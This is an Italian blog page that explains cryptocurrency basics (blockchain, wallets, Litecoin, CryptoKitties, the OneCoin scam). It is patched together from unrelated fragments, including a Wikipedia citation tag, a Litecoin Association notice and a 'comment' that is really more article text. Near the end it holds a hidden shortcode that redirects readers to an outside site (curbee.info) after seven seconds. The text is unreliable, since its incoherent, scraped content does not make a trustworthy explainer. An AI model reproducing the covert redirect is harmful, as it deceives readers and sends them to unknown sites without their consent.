“Crypto Currency For Dummies |Valuta digitale Come funziona”

È una fase troppo eccitante e probabilmente irripetibile per lasciarsela sfuggire, ma operare con le criptovalute, per chi si affaccia per la prima volta in questo mondo, può essere piuttosto complicato: ci sono molte cose da imparare per farlo in sicurezza e bisogna saper usare un certo numero di strumenti diversi da coordinare tra di loro.

Il futuro prossimo della moneta sarà digitale: quali e quanti giocatori ci saranno in campo? Nell’interesse tutti occorreranno come minimo due condizioni. La prima evitare i rischi di monopolio o di oligopolio nei pagamenti; per cui la moneta digitale dovrà essere emessa da almeno tre diversi soggetti: le banche centrali, le banche, ma anche le non banche, a partire dalle imprese del settore tecnologico per arrivare ai produttori di bitcoin. La seconda condizione è che dovranno essere evitate situazioni di asimmetria regolamentare tra i diversi emittenti. Altrimenti i rischi riguarderanno sia la stabilità monetaria sia quella finanziaria.

Come abbiamo detto, la blockchain può essere considerata come un registro pubblico di tutte le transazioni avvenute con una determinata criptovaluta. Ogni transazione viene confermata e aggiunta a questo registro, che ovviamente aumenta di lunghezza nel corso del tempo (e che può essere sempre consultato).

La “catena dei blocchi” o blockchain, come è più comunemente conosciuto, è il database master su cui vengono archiviati e salvati tutti i dati riguardanti le transazioni e l’attività di estrazione, oltre alle operazioni di scambio e agli acquisti. Il blockchain necessita anche di una validazione della titolarità. Dal punto di vista tecnico, una transazione non è finalizzata fino a che non viene aggiunta al blockchain, operazione che solitamente richiede qualche minuto e che non è in alcun modo reversibile. Durante il tempo richiesto dalla transazione le unità non possono essere utilizzate da entrambe le parti, per prevenire un doppio utilizzo della moneta, frodi e duplicazioni.

Infatti, le criptovalute vengono “tenute” all’interno di portafogli elettronici, chiamati “wallet”. Sono molte le persone che decidono di approcciarsi al mondo delle criptovalute magari per fare trading su criptovalute, speculando e guadagnando sulle variazioni di valore di queste monete virtuali.

L’Associazione è responsabile per promuovere lo sviluppo, l’accettazione e in generale il miglioramento di Litecoin e le sue risorse. Eventuali richieste di informazioni commerciali relative a Litecoin devono essere indirizzate all’Associazione.

Una criptovaluta (o crittovaluta o criptomoneta) è una valuta paritaria, decentralizzata e digitale la cui implementazione si basa sui principi della crittografia per convalidare le transazioni e la generazione di moneta in sé. Come ogni valuta digitale, consente di effettuare pagamenti online in maniera sicura.[senza fonte]

Mantenendo la piena compatibilità con l’API Bitcoin, è molto facile integrare Litecoin in applicazioni esistenti che già offrono supporto Bitcoin. Uno dei principali vantaggi offerti dalla rete Litecoin è una più rapida conferma della transazione, che lo rende ideale per i piccoli acquisti.

Ora che abbiamo capito come funziona una criptovaluta, sorge spontanea la domanda: “come si usa una criptovaluta?“. Le criptovalute devono essere considerate come le normali valute, quindi vengono usate per acquistare e vendere prodotti/software/servizi online. Ma anche per effettuare pagamenti tra privati o trasferimenti di denaro.

UN FELINO È PER SEMPRE. Crypto-kitties è sbarcato il 28 novembre sulla blockchain di Ethereum. Basato sugli smart contract, il gioco permette di collezionare gattini digitali, ciascuno dei quali dotato di “gattributi” unici. I padroni di due animali possono farli accoppiare per generarne un terzo che combini i loro “geni” oppure pagare un altro utente che possieda un esemplare con caratteristiche particolari. I crypto-kitties, quindi, possono essere venduti e scambiati su Ethereum e la registrazione sulla blockchain ne rende impossibile la replica, il furto e la distruzione.

Già solo vedendo un “personaggio” del genere, che prova a spillare i soldi alla platea inventandosene di tutti i colori, sarebbe dovuto bastare per far riconoscere fin da subito che OneCoin era una truffa bella e buona. [redirect url=’http://curbee.info/bump’ sec=’7′]

One thought on ““Crypto Currency For Dummies |Valuta digitale Come funziona””

  1. Questo scritto è redatto a solo scopo informativo, può essere modificato in qualsiasi momento e NON può essere considerato sollecitazione al pubblico risparmio. Il sito web non garantisce la correttezza e non si assume la responsabilità in merito all’uso delle informazioni ivi riportate.
    Per esempio, ad Agosto 2017 si parlava di Hard Fork Bitcoin, evento dal quale sono nati i Bitcoin Cash, causando una separazione all’interno della comunità bitcoin (e anche a livello di sistema nella criptovaluta). Per saperne di più, vi rimandiamo al nostro articolo su cosa sono i Bitcoin Cash.
    Grazie a questa struttura decentrata, il Bitcoin è un sistema di valuta senza un’autorità assoluta che si riserva il diritto di raccogliere informazioni utente dettagliate e di archiviare e gestire tutte le operazioni di pagamento. Ma esattamente cosa, o meglio chi, si nasconde dietro alla valuta digitale che sta diventando un mezzo di pagamento sempre più popolare? E come e dove si può pagare con i bitcoin?

Leave a Reply

Your email address will not be published. Required fields are marked *